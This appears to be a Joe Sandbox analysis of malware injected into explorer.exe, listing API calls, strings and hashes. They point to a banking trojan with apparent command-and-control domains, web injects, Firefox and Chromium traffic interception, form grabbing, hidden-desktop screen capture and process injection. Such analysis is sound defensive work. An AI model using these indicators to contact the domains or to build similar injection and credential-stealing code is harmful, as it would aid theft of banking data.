GetProcAddress.KERNEL32 ref: 0F3C42FD
GetProcAddress.KERNEL32 ref: 0F3C4314
GetProcAddress.KERNEL32 ref: 0F3C432B
GetProcAddress.KERNEL32 ref: 0F3C4342
GetProcAddress.KERNEL32 ref: 0F3C4359
GetProcAddress.KERNEL32 ref: 0F3C4370
GetProcAddress.KERNEL32 ref: 0F3C4387
GetProcAddress.KERNEL32 ref: 0F3C439E
GetProcAddress.KERNEL32 ref: 0F3C43B5
GetProcAddress.KERNEL32 ref: 0F3C43CC
GetProcAddress.KERNEL32 ref: 0F3C43E3
GetProcAddress.KERNEL32 ref: 0F3C43FF
GetProcAddress.KERNEL32 ref: 0F3C441B
GetProcAddress.KERNEL32 ref: 0F3C4432
GetProcAddress.KERNEL32 ref: 0F3C4449
GetProcAddress.KERNEL32 ref: 0F3C4460
GetProcAddress.KERNEL32 ref: 0F3C4477
GetProcAddress.KERNEL32 ref: 0F3C448E

Part of subcall function 0F3C6828: MultiByteToWideChar.KERNEL32 ref: 0F3C685C
Part of subcall function 0F3C6828: MultiByteToWideChar.KERNEL32 ref: 0F3C6894

Strings

GetModuleInformation, xrefs: 0F3C2DCF
LeaveCriticalSection, xrefs: 0F3C2CEF
GetWindowLongA, xrefs: 0F3C30ED
WSAStartup, xrefs: 0F3C2B4B
GetWindowRect, xrefs: 0F3C308B
GetUserNameW, xrefs: 0F3C2EBD
Content-Length: , xrefs: 0F3C32AD
CloseHandle, xrefs: 0F3C2C0F
:Zone.Identifier, xrefs: 0F3C2961
Process32Next, xrefs: 0F3C2D6D
GetUserNameExA, xrefs: 0F3C2AB1
memcpy, xrefs: 0F3C2BD7
Connection, xrefs: 0F3C3363
http(s)://, xrefs: 0F3C33EB
GetTopWindow, xrefs: 0F3C323D
\\.\pipe\%s, xrefs: 0F3C3431
SetThreadDesktop, xrefs: 0F3C300D
strtod, xrefs: 0F3C2D43
VerQueryValueA, xrefs: 0F3C2DC1
ntdll.dll, xrefs: 0F3C28D5
_errno, xrefs: 0F3C2CFD
StrChrA, xrefs: 0F3C2D7B
ResumeThread, xrefs: 0F3C2E77
IsWow64Process, xrefs: 0F3C2E85
LookupAccountNameA, xrefs: 0F3C2ABF
wininet.dll, xrefs: 0F3C2945
WideCharToMultiByte, xrefs: 0F3C298B
ReleaseMutex, xrefs: 0F3C2F73
Shell_TrayWnd, xrefs: 0F3C345B
ExpandEnvironmentStringsA, xrefs: 0F3C2DEB
SHAppBarMessage, xrefs: 0F3C3109
nss3.dll, xrefs: 0F3C331D
htons, xrefs: 0F3C2B75
GetModuleFileNameA, xrefs: 0F3C2A17
Trusteer, xrefs: 0F3C34A1
SetThreadContext, xrefs: 0F3C2C7F
CreateCompatibleDC, xrefs: 0F3C31C6
StrToIntA, xrefs: 0F3C2D89
RegOpenKeyExA, xrefs: 0F3C2E4D
ReleaseDC, xrefs: 0F3C3141
NtCreateThreadEx, xrefs: 0F3C2C2B
WaitForSingleObject, xrefs: 0F3C2F81
strtoul, xrefs: 0F3C2D27
As we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking , xrefs: 0F3C344D
RealGetWindowClassA, xrefs: 0F3C30B5
DeleteObject, xrefs: 0F3C315D
ReadFile, xrefs: 0F3C2E23
closesocket, xrefs: 0F3C2BAD
Accept-Encoding, xrefs: 0F3C3347
SetStretchBltMode, xrefs: 0F3C319C
GetFileVersionInfoSizeA, xrefs: 0F3C2DA5
StrStrIA, xrefs: 0F3C2B21
DisconnectNamedPipe, xrefs: 0F3C2F03
Process32First, xrefs: 0F3C2D5F
, xrefs: 0F3C33BA
User32.dll, xrefs: 0F3C28AB
SHFileOperationA, xrefs: 0F3C2C8D
ConvertSidToStringSidA, xrefs: 0F3C2ACD
GetInjects, xrefs: 0F3C330F
msvcrt.dll, xrefs: 0F3C28C7
GetVolumeInformationA, xrefs: 0F3C2AA3
GetCurrentProcessId, xrefs: 0F3C2F9D
RtlGetCompressionWorkSpaceSize, xrefs: 0F3C2FFF
SendMessageA, xrefs: 0F3C3053
GetLastError, xrefs: 0F3C2CD3
Location: , xrefs: 0F3C33A5
InitializeCriticalSection, xrefs: 0F3C2CC5
GetDC, xrefs: 0F3C31F0
NtSetValueKey, xrefs: 0F3C2C01
SetWindowLongA, xrefs: 0F3C30DF
text/html, xrefs: 0F3C3394
open, xrefs: 0F3C343F
tolower, xrefs: 0F3C2D0B
lstrcmpiA, xrefs: 0F3C2AF7
Host: , xrefs: 0F3C33DD
CreateNamedPipeA, xrefs: 0F3C2EE7
LoadLibraryA, xrefs: 0F3C2873
lstrcpyA, xrefs: 0F3C2A79
realloc, xrefs: 0F3C2B3D
strtol, xrefs: 0F3C2B2F
GetWindowThreadProcessId, xrefs: 0F3C2CB7
GetMenuItemID, xrefs: 0F3C3099
CreateProcessA, xrefs: 0F3C2C1D
free, xrefs: 0F3C29C3
PostMessageA, xrefs: 0F3C3045
GetTempFileNameA, xrefs: 0F3C2F2D
Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity, xrefs: 0F3C329F
GetWindow, xrefs: 0F3C321A
RtlCompressBuffer, xrefs: 0F3C2FF1
HttpQueryInfoW, xrefs: 0F3C2FE3
recv, xrefs: 0F3C2B9F
isxdigit, xrefs: 0F3C2D35
InternetCrackUrlA, xrefs: 0F3C2F11
GetNativeSystemInfo, xrefs: 0F3C2E93
%s: *, xrefs: 0F3C33CF
GetComputerNameW, xrefs: 0F3C2ECB
ExitProcess, xrefs: 0F3C2A5D
GetThreadContext, xrefs: 0F3C2C71
Sleep, xrefs: 0F3C2BE5
TerminateProcess, xrefs: 0F3C2C39
gdi32.dll, xrefs: 0F3C2953
GetDIBits, xrefs: 0F3C3172
firefox.exe, xrefs: 0F3C3301
CreateDesktopA, xrefs: 0F3C301B
WriteProcessMemory, xrefs: 0F3C29DF
EnterCriticalSection, xrefs: 0F3C2CE1
connect, xrefs: 0F3C2B83
CreateCompatibleBitmap, xrefs: 0F3C31DB
Shell32.dll, xrefs: 0F3C28F1
LocalFree, xrefs: 0F3C2ADB
CreateRemoteThread, xrefs: 0F3C29ED
child.dll, xrefs: 0F3C3493
POST , xrefs: 0F3C3267
wsprintfA, xrefs: 0F3C29A7
HttpQueryInfoA, xrefs: 0F3C2FD5
Secur32.dll, xrefs: 0F3C28FF
memcmp, xrefs: 0F3C2DDD
Content-Type: , xrefs: 0F3C337F
MultiByteToWideChar, xrefs: 0F3C29B5
TerminateThread, xrefs: 0F3C3037
RegSetValueExA, xrefs: 0F3C2E3F
Kernel32.dll, xrefs: 0F3C286C
lstrlenA, xrefs: 0F3C2A4F
LocalAlloc, xrefs: 0F3C2999
RegCloseKey, xrefs: 0F3C2E5B
isdigit, xrefs: 0F3C2D19
MessageBoxA, xrefs: 0F3C296F
.exe, xrefs: 0F3C324B
FindWindowA, xrefs: 0F3C2C47
DeleteFileA, xrefs: 0F3C2FAB
_strnicmp, xrefs: 0F3C2A41
ioctlsocket, xrefs: 0F3C2F49
/api.php, xrefs: 0F3C2896
EnumWindows, xrefs: 0F3C2F8F
CreateMutexA, xrefs: 0F3C2F65
auth.xn--conbase-sfb.xyz, xrefs: 0F3C2865
Content-Length: , xrefs: 0F3C318E
socket, xrefs: 0F3C2B59
identity, xrefs: 0F3C3355
CreateToolhelp32Snapshot, xrefs: 0F3C2D51
chunked, xrefs: 0F3C32C9
PR_Read, xrefs: 0F3C332B
ScreenToClient, xrefs: 0F3C306F
exchanger.ink, xrefs: 0F3C2881
StrStrA, xrefs: 0F3C2B13
PathFindFileNameA, xrefs: 0F3C2A25
GetWindowPlacement, xrefs: 0F3C30D1
Firefox, xrefs: 0F3C3179
CreateDirectoryA, xrefs: 0F3C2FC7
CreateThread, xrefs: 0F3C2EAF
GetTempPathA, xrefs: 0F3C2F1F
Mozilla, xrefs: 0F3C3415
HTTP/1.1 200 OK, xrefs: 0F3C32BB
PR_Write, xrefs: 0F3C3339
GetDesktopWindow, xrefs: 0F3C3125
Shlwapi.dll, xrefs: 0F3C28E3
ChildWindowFromPoint, xrefs: 0F3C3061
VirtualAllocEx, xrefs: 0F3C29D1
OpenProcess, xrefs: 0F3C2EA1
Advapi32.dll, xrefs: 0F3C290D
ShellExecuteA, xrefs: 0F3C2F3B
ws2_32.dll, xrefs: 0F3C291B
PathFileExistsA, xrefs: 0F3C2FB9
NtUnmapViewOfSection, xrefs: 0F3C2C55
ConnectNamedPipe, xrefs: 0F3C2EF5
IsWindowVisible, xrefs: 0F3C3205
GET , xrefs: 0F3C3275
HTTP/1.1, xrefs: 0F3C3283
Transfer-Encoding, xrefs: 0F3C314F
GetPrivateProfileStringA, xrefs: 0F3C2E07
CopyFileA, xrefs: 0F3C2A95
WindowFromPoint, xrefs: 0F3C30FB
GetPrivateProfileSectionNamesA, xrefs: 0F3C2DF9
GetFileSize, xrefs: 0F3C2E69
lstrcmpA, xrefs: 0F3C2B05
version.dll, xrefs: 0F3C2929
GetModuleHandleA, xrefs: 0F3C2D97
gethostbyname, xrefs: 0F3C2B67
close, xrefs: 0F3C3371
Psapi.dll, xrefs: 0F3C2937
FindNextFileA, xrefs: 0F3C2CA9
DeleteDC, xrefs: 0F3C3133
GetProcAddress, xrefs: 0F3C29FB
SelectObject, xrefs: 0F3C31B1
CreateFileA, xrefs: 0F3C2E15
verclsid.exe, xrefs: 0F3C3469
info|%d|%d|%d|%d|%s|%s|%d|%d, xrefs: 0F3C3407
PrintWindow, xrefs: 0F3C322F
RegQueryValueExA, xrefs: 0F3C3117
PathRemoveFileSpecA, xrefs: 0F3C2A09
Host: , xrefs: 0F3C3291
SHGetFolderPathA, xrefs: 0F3C2A6B
NtQueryInformationProcess, xrefs: 0F3C2C63
GetFileVersionInfoA, xrefs: 0F3C2DB3
MenuItemFromPoint, xrefs: 0F3C30A7
NtOpenKey, xrefs: 0F3C2BF3
GetWindowsDirectoryA, xrefs: 0F3C297D
OpenDesktopA, xrefs: 0F3C3029
Content-Length, xrefs: 0F3C3148
ping, xrefs: 0F3C32F3
WSACleanup, xrefs: 0F3C2BBB
form|%s|%s|%d|, xrefs: 0F3C33F9
GetVersionExA, xrefs: 0F3C2ED9
ntohs, xrefs: 0F3C2F57
KernelBase.dll, xrefs: 0F3C28B9
MoveWindow, xrefs: 0F3C307D
StretchBlt, xrefs: 0F3C3187
WriteFile, xrefs: 0F3C2E31
send, xrefs: 0F3C2B91
PtInRect, xrefs: 0F3C30C3
strncmp, xrefs: 0F3C2A33
memset, xrefs: 0F3C2BC9
lstrcatA, xrefs: 0F3C2A87
malloc, xrefs: 0F3C2AE9
FindFirstFileA, xrefs: 0F3C2C9B

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: AddressProc$LibraryLoad$ByteCharMultiWide
String ID: $%s: *$Content-Length: $Content-Type: $Host: $Location: $Pragma: no-cacheContent-type: text/htmlConnection: closeUser-Agent: CasperSecurity$ HTTP/1.1$.exe$/api.php$:Zone.Identifier$Accept-Encoding$Advapi32.dll$As we walked along the flatblock marina, I was calm on the outside, but thinking all the time. So now it was to be Georgie the general, saying what we should do and what not to do, and Dim as his mindless greeding bulldog. But suddenly I viddied that thinking $ChildWindowFromPoint$CloseHandle$ConnectNamedPipe$Connection$Content-Length$Content-Length: $ConvertSidToStringSidA$CopyFileA$CreateCompatibleBitmap$CreateCompatibleDC$CreateDesktopA$CreateDirectoryA$CreateFileA$CreateMutexA$CreateNamedPipeA$CreateProcessA$CreateRemoteThread$CreateThread$CreateToolhelp32Snapshot$DeleteDC$DeleteFileA$DeleteObject$DisconnectNamedPipe$EnterCriticalSection$EnumWindows$ExitProcess$ExpandEnvironmentStringsA$FindFirstFileA$FindNextFileA$FindWindowA$Firefox$GET $GetComputerNameW$GetCurrentProcessId$GetDC$GetDIBits$GetDesktopWindow$GetFileSize$GetFileVersionInfoA$GetFileVersionInfoSizeA$GetInjects$GetLastError$GetMenuItemID$GetModuleFileNameA$GetModuleHandleA$GetModuleInformation$GetNativeSystemInfo$GetPrivateProfileSectionNamesA$GetPrivateProfileStringA$GetProcAddress$GetTempFileNameA$GetTempPathA$GetThreadContext$GetTopWindow$GetUserNameExA$GetUserNameW$GetVersionExA$GetVolumeInformationA$GetWindow$GetWindowLongA$GetWindowPlacement$GetWindowRect$GetWindowThreadProcessId$GetWindowsDirectoryA$HTTP/1.1 200 OK$Host: $HttpQueryInfoA$HttpQueryInfoW$InitializeCriticalSection$InternetCrackUrlA$IsWindowVisible$IsWow64Process$Kernel32.dll$KernelBase.dll$LeaveCriticalSection$LoadLibraryA$LocalAlloc$LocalFree$LookupAccountNameA$MenuItemFromPoint$MessageBoxA$MoveWindow$Mozilla$MultiByteToWideChar$NtCreateThreadEx$NtOpenKey$NtQueryInformationProcess$NtSetValueKey$NtUnmapViewOfSection$OpenDesktopA$OpenProcess$POST $PR_Read$PR_Write$PathFileExistsA$PathFindFileNameA$PathRemoveFileSpecA$PostMessageA$PrintWindow$Process32First$Process32Next$Psapi.dll$PtInRect$ReadFile$RealGetWindowClassA$RegCloseKey$RegOpenKeyExA$RegQueryValueExA$RegSetValueExA$ReleaseDC$ReleaseMutex$ResumeThread$RtlCompressBuffer$RtlGetCompressionWorkSpaceSize$SHAppBarMessage$SHFileOperationA$SHGetFolderPathA$ScreenToClient$Secur32.dll$SelectObject$SendMessageA$SetStretchBltMode$SetThreadContext$SetThreadDesktop$SetWindowLongA$Shell32.dll$ShellExecuteA$Shell_TrayWnd$Shlwapi.dll$Sleep$StrChrA$StrStrA$StrStrIA$StrToIntA$StretchBlt$TerminateProcess$TerminateThread$Transfer-Encoding$Trusteer$User32.dll$VerQueryValueA$VirtualAllocEx$WSACleanup$WSAStartup$WaitForSingleObject$WideCharToMultiByte$WindowFromPoint$WriteFile$WriteProcessMemory$\\.\pipe\%s$_errno$_strnicmp$auth.xn--conbase-sfb.xyz$child.dll$chunked$close$closesocket$connect$exchanger.ink$firefox.exe$form|%s|%s|%d|$free$gdi32.dll$gethostbyname$htons$http(s)://$identity$info|%d|%d|%d|%d|%s|%s|%d|%d$ioctlsocket$isdigit$isxdigit$lstrcatA$lstrcmpA$lstrcmpiA$lstrcpyA$lstrlenA$malloc$memcmp$memcpy$memset$msvcrt.dll$nss3.dll$ntdll.dll$ntohs$open$ping$realloc$recv$send$socket$strncmp$strtod$strtol$strtoul$text/html$tolower$verclsid.exe$version.dll$wininet.dll$ws2_32.dll$wsprintfA
API String ID: 2683923594-3725008869
Opcode ID: cea85faa188cef2ac31b4e9c32339f6ee1745bb61285e03a6bf18250cc518dce
Instruction ID: 3b5a71d639cd6ba78741338fc7276aef3e602a42d095952e3bc22dc7c4a5f1dd
Opcode Fuzzy Hash: cea85faa188cef2ac31b4e9c32339f6ee1745bb61285e03a6bf18250cc518dce
Instruction Fuzzy Hash: C2030778A01F0295FA259B65F8943A573A9BB49BB0F505236CC8943B74EF3CC29CE354

Function 0F3C4520 Relevance: 72.1, APIs: 40, Strings: 1, Instructions: 342
stringnetworkCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

lstrcpy.KERNEL32 ref: 0F3C4573
lstrcatA.KERNEL32 ref: 0F3C4582
lstrcatA.KERNEL32 ref: 0F3C4594
lstrcatA.KERNEL32 ref: 0F3C45A6
lstrcatA.KERNEL32 ref: 0F3C45B5
lstrcatA.KERNEL32 ref: 0F3C45C7
lstrcatA.KERNEL32 ref: 0F3C45E3
wsprintfA.USER32 ref: 0F3C45F9
lstrcatA.KERNEL32 ref: 0F3C4609
lstrcatA.KERNEL32 ref: 0F3C461B
lstrcatA.KERNEL32 ref: 0F3C462D
WSAStartup.WS2_32 ref: 0F3C463F
socket.WS2_32 ref: 0F3C465F
gethostbyname.WS2_32 ref: 0F3C4679
memcpy.MSVCRT ref: 0F3C4699
htons.WS2_32 ref: 0F3C46A9
connect.WS2_32 ref: 0F3C46C0
lstrlenA.KERNEL32 ref: 0F3C46D3
send.WS2_32 ref: 0F3C46E7
send.WS2_32 ref: 0F3C4708
recv.WS2_32 ref: 0F3C4767
lstrcmpiA.KERNEL32 ref: 0F3C47BA
lstrlenA.KERNEL32 ref: 0F3C47E1
StrStrA.SHLWAPI ref: 0F3C47F9
lstrcmpiA.KERNEL32 ref: 0F3C4817
strtol.MSVCRT ref: 0F3C482D
lstrcmpiA.KERNEL32 ref: 0F3C4889
lstrcmpiA.KERNEL32 ref: 0F3C489D
_malloc_dbg.MSVCRT ref: 0F3C48F5
recv.WS2_32 ref: 0F3C4918
strtol.MSVCRT ref: 0F3C495D
_realloc_dbg.MSVCRT ref: 0F3C49A2
recv.WS2_32 ref: 0F3C49C7
recv.WS2_32 ref: 0F3C49EC
_malloc_dbg.MSVCRT ref: 0F3C4A41
recv.WS2_32 ref: 0F3C4A69
_malloc_dbg.MSVCRT ref: 0F3C4A82
??3@YAXPEAX@Z.MSVCRT ref: 0F3C4AA1
closesocket.WS2_32 ref: 0F3C4AAA
WSACleanup.WS2_32 ref: 0F3C4AB0

Strings

@, xrefs: 0F3C48D6

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: lstrcat$recv$lstrcmpi$_malloc_dbg$lstrlensendstrtol$??3@CleanupStartup_realloc_dbgclosesocketconnectgethostbynamehtonslstrcpymemcpysocketwsprintf
String ID: @
API String ID: 350249936-3454712805
Opcode ID: 7a43aa6142627051dcf28554667ab40463675c8a7da61fa207b2092942d0a0b7
Instruction ID: 1fe52355bdfed31a727e91433faaed4090f4d2efc60d6b771f261eb3498450cd
Opcode Fuzzy Hash: 7a43aa6142627051dcf28554667ab40463675c8a7da61fa207b2092942d0a0b7
Instruction Fuzzy Hash: CCE1B132610A8296EB30CF26E8547AD77A1F744BA9F805139CE0A47F25DF38DA9CC740

Function 08CB167C Relevance: 19.7, APIs: 13, Instructions: 208
threadmemoryinjectionCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32 ref: 08CB16CD
Thread32First.KERNEL32 ref: 08CB16F1
GetCurrentProcessId.KERNEL32 ref: 08CB1707
GetCurrentThreadId.KERNEL32 ref: 08CB1713
HeapAlloc.KERNEL32 ref: 08CB173D
Thread32Next.KERNEL32 ref: 08CB1798
CloseHandle.KERNEL32 ref: 08CB17A9
OpenThread.KERNEL32 ref: 08CB17D2
SuspendThread.KERNEL32 ref: 08CB17E7
GetThreadContext.KERNEL32 ref: 08CB1800
SetThreadContext.KERNEL32 ref: 08CB18B5
CloseHandle.KERNEL32 ref: 08CB18CF

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Thread$CloseContextCurrentHandleThread32$AllocCreateFirstHeapNextOpenProcessSnapshotSuspendToolhelp32
String ID:
API String ID: 2768260010-0
Opcode ID: 6539af37d86e3f167f80c7e9692eed0ec81c452df2b947bdc02bec03bd4feca2
Instruction ID: 5ec3144d500fbb5260f5bf5990138e18107756413fbea1fe433e541b1b5e1ac7
Opcode Fuzzy Hash: 6539af37d86e3f167f80c7e9692eed0ec81c452df2b947bdc02bec03bd4feca2
Instruction Fuzzy Hash: E281B672A11E8086EB28CF26D4607AD77B1FB48B5AF0D811BDA5E47B54DF39C682C710

Function 08B9AD08 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 399
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 08B9AFC6
CreateFileMappingA.KERNEL32 ref: 08B9B02F
MapViewOfFile.KERNEL32 ref: 08B9B04D

Strings

ecti, xrefs: 08B9B022
ve, xrefs: 08B9B029
Self, xrefs: 08B9B00F
Refl, xrefs: 08B9B01B

Memory Dump Source

Source File: 00000002.00000002.3156274373.0000000008B90000.00000020.00000400.00020000.00000000.sdmp, Offset: 08B90000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8b90000_explorer.jbxd

Yara matches

Similarity

API ID: File$AllocCreateMappingViewVirtual
String ID: Refl$Self$ecti$ve
API String ID: 714694481-879027269
Opcode ID: d565dd23c1e7a46cf9244b3861bfe1fcdaf73303d77d2f6eb2b6a77248566caf
Instruction ID: ebcaea0b90b06c9a37572c48212e2ff18c34fe97caf06e0d37f9dc80f9e31381
Opcode Fuzzy Hash: d565dd23c1e7a46cf9244b3861bfe1fcdaf73303d77d2f6eb2b6a77248566caf
Instruction Fuzzy Hash: 84E112B2B006A0CBDF24CF299440BAD3B65FB04FAAB159179DF9A57B44DB39D452C700

Function 0C3696E0 Relevance: 12.6, APIs: 3, Strings: 4, Instructions: 381
filememoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32 ref: 0C36996A
CreateFileMappingA.KERNEL32 ref: 0C3699D2
MapViewOfFile.KERNEL32 ref: 0C3699ED

Strings

ve, xrefs: 0C3699CC
Refl, xrefs: 0C3699BE
ecti, xrefs: 0C3699C5
Self, xrefs: 0C3699B2

Memory Dump Source

Source File: 00000002.00000002.3176672303.000000000C350000.00000020.00000001.00020000.00000000.sdmp, Offset: 0C350000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_c350000_explorer.jbxd

Yara matches

Similarity

API ID: File$AllocCreateMappingViewVirtual
String ID: Refl$Self$ecti$ve
API String ID: 714694481-879027269
Opcode ID: 3ab671dce0f2bee2d33412448951d7c02f4600516af10e46328a896e7fd24c04
Instruction ID: 7b49f24cf59dcf70fc18114970552712635cc3f79637cd687244530fa6dcd752
Opcode Fuzzy Hash: 3ab671dce0f2bee2d33412448951d7c02f4600516af10e46328a896e7fd24c04
Instruction Fuzzy Hash: 5BE1F176B217948BCB24CF2AD58076D77A6FB04B98B25C215DF4A47F48DB39D452CB00

Function 0F3C6DC0 Relevance: 9.1, APIs: 6, Instructions: 82
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetUserNameW.ADVAPI32 ref: 0F3C6E69
GetComputerNameW.KERNEL32 ref: 0F3C6E83

Part of subcall function 0F3C678C: WideCharToMultiByte.KERNEL32 ref: 0F3C67CC
Part of subcall function 0F3C678C: _malloc_dbg.MSVCRT ref: 0F3C67DD
Part of subcall function 0F3C678C: WideCharToMultiByte.KERNEL32 ref: 0F3C680D

GetNativeSystemInfo.KERNEL32 ref: 0F3C6EAC
GetVersionExA.KERNEL32 ref: 0F3C6EBD
wsprintfA.USER32 ref: 0F3C6F03

Part of subcall function 0F3C6130: EnterCriticalSection.KERNEL32 ref: 0F3C6170
Part of subcall function 0F3C6130: RtlInitializeCriticalSection.NTDLL ref: 0F3C617D
Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61AA
Part of subcall function 0F3C6130: lstrcpy.KERNEL32 ref: 0F3C61CD
Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61DD
Part of subcall function 0F3C6130: lstrcatA.KERNEL32 ref: 0F3C61ED
Part of subcall function 0F3C6130: LeaveCriticalSection.KERNEL32 ref: 0F3C624C
Part of subcall function 0F3C6130: memcpy.MSVCRT ref: 0F3C6263
Part of subcall function 0F3C6130: lstrlenA.KERNEL32 ref: 0F3C6270

??3@YAXPEAX@Z.MSVCRT ref: 0F3C6F17

Memory Dump Source

Source File: 00000002.00000002.3202220761.000000000F3C0000.00000040.00000001.00020000.00000000.sdmp, Offset: 0F3C0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_f3c0000_explorer.jbxd

Yara matches

Similarity

API ID: CriticalSection$ByteCharMultiNameWidelstrcatlstrcpy$??3@ComputerEnterInfoInitializeLeaveNativeSystemUserVersion_malloc_dbglstrlenmemcpywsprintf
String ID:
API String ID: 2622007461-0
Opcode ID: 8a8c2bd87329a6aa3a069bc8796b17b9ad3883f058562c429e9bc75352aa0eec
Instruction ID: cd783dd7a7dd2c782ec27c7bdd0200f3872729bb4f59207756dfed30e52ec25c
Opcode Fuzzy Hash: 8a8c2bd87329a6aa3a069bc8796b17b9ad3883f058562c429e9bc75352aa0eec
Instruction Fuzzy Hash: 00413B32A10B819AE730DF35E8543DE77A5F788B58F804129DA4D47A58EF79C649CB80

Function 08CB21AC Relevance: 7.6, APIs: 5, Instructions: 141
memoryCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetSystemInfo.KERNEL32 ref: 08CB21D5
VirtualQuery.KERNEL32 ref: 08CB225B
VirtualAlloc.KERNEL32 ref: 08CB229B
VirtualQuery.KERNEL32 ref: 08CB22E7
VirtualAlloc.KERNEL32 ref: 08CB2332

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: Virtual$AllocQuery$InfoSystem
String ID:
API String ID: 768245703-0
Opcode ID: 93733bfa0dface053fca03936f02942d9e1b0f03c42b701bbe2b4e4918eb40e6
Instruction ID: 245e16c4f852f213fd2ef4d35425db8c43f827612430fcb295b7f3598e48e3b5
Opcode Fuzzy Hash: 93733bfa0dface053fca03936f02942d9e1b0f03c42b701bbe2b4e4918eb40e6
Instruction Fuzzy Hash: 9B51CF32B12E5085EB158F62D5047A87776B708FE6F088025CE6E6BB08DB78CA878341

Function 08CBC000 Relevance: 73.7, APIs: 31, Strings: 11, Instructions: 235
stringfileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

Part of subcall function 08CBC4BC: WideCharToMultiByte.KERNEL32 ref: 08CBC4FC
Part of subcall function 08CBC4BC: malloc.LIBCMT ref: 08CBC50D
Part of subcall function 08CBC4BC: WideCharToMultiByte.KERNEL32 ref: 08CBC53D

malloc.LIBCMT ref: 08CBC045

Part of subcall function 08CB2FC4: _FF_MSGBANNER.LIBCMT ref: 08CB2FF4
Part of subcall function 08CB2FC4: _NMSG_WRITE.LIBCMT ref: 08CB2FFE
Part of subcall function 08CB2FC4: HeapAlloc.KERNEL32 ref: 08CB3019
Part of subcall function 08CB2FC4: _callnewh.LIBCMT ref: 08CB3032
Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB303D
Part of subcall function 08CB2FC4: _errno.LIBCMT ref: 08CB3048

PathFindFileNameA.SHLWAPI ref: 08CBC050
lstrcpyA.KERNEL32 ref: 08CBC066
SHGetFolderPathA.SHELL32 ref: 08CBC09D
lstrcatA.KERNEL32 ref: 08CBC0AF
lstrcatA.KERNEL32 ref: 08CBC0C1
PathFileExistsA.SHLWAPI ref: 08CBC0CC
lstrcmpiA.KERNEL32 ref: 08CBC0F4
lstrcmpiA.KERNEL32 ref: 08CBC108
lstrcmpiA.KERNEL32 ref: 08CBC11C
lstrcmpiA.KERNEL32 ref: 08CBC130
lstrcmpiA.KERNEL32 ref: 08CBC144
lstrcmpiA.KERNEL32 ref: 08CBC158
lstrcmpiA.KERNEL32 ref: 08CBC16C
lstrcatA.KERNEL32 ref: 08CBC186

Part of subcall function 08CBC3E0: GetNativeSystemInfo.KERNEL32 ref: 08CBC3F2

TerminateProcess.KERNEL32 ref: 08CBC261
wsprintfA.USER32 ref: 08CBC297
CreateFileA.KERNEL32 ref: 08CBC2C4
WriteFile.KERNEL32 ref: 08CBC2E4
WriteFile.KERNEL32 ref: 08CBC300
lstrlenA.KERNEL32 ref: 08CBC313
WriteFile.KERNEL32 ref: 08CBC333
WriteFile.KERNEL32 ref: 08CBC34E
lstrlenA.KERNEL32 ref: 08CBC357
WriteFile.KERNEL32 ref: 08CBC377
WriteFile.KERNEL32 ref: 08CBC392
CloseHandle.KERNEL32 ref: 08CBC39B
free.LIBCMT ref: 08CBC3A4
free.LIBCMT ref: 08CBC3AC
free.LIBCMT ref: 08CBC3B4
free.LIBCMT ref: 08CBC3BC

Part of subcall function 08CBC55C: CreateFileA.KERNEL32 ref: 08CBC5B0

Strings

--disable-http2 --use-spdy=off --disable-quic, xrefs: 08CBC17C
AvastBrowser.exe, xrefs: 08CBC14E
browser.exe, xrefs: 08CBC13A
trusteer, xrefs: 08CBC0B5
AVGBrowser.exe, xrefs: 08CBC162
msedge.exe, xrefs: 08CBC112
brave.exe, xrefs: 08CBC126
chrome.exe, xrefs: 08CBC0DE
Diamotrixed, xrefs: 08CBC282
\\.\pipe\%s, xrefs: 08CBC289
opera.exe, xrefs: 08CBC0FE

Memory Dump Source

Source File: 00000002.00000002.3156915026.0000000008CB0000.00000040.00000001.00020000.00000000.sdmp, Offset: 08CB0000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_8cb0000_explorer.jbxd

Yara matches

Similarity

API ID: File$lstrcmpi$Write$free$Pathlstrcat$ByteCharCreateMultiWide_errnolstrlenmalloc$AllocCloseExistsFindFolderHandleHeapInfoNameNativeProcessSystemTerminate_callnewhlstrcpywsprintf
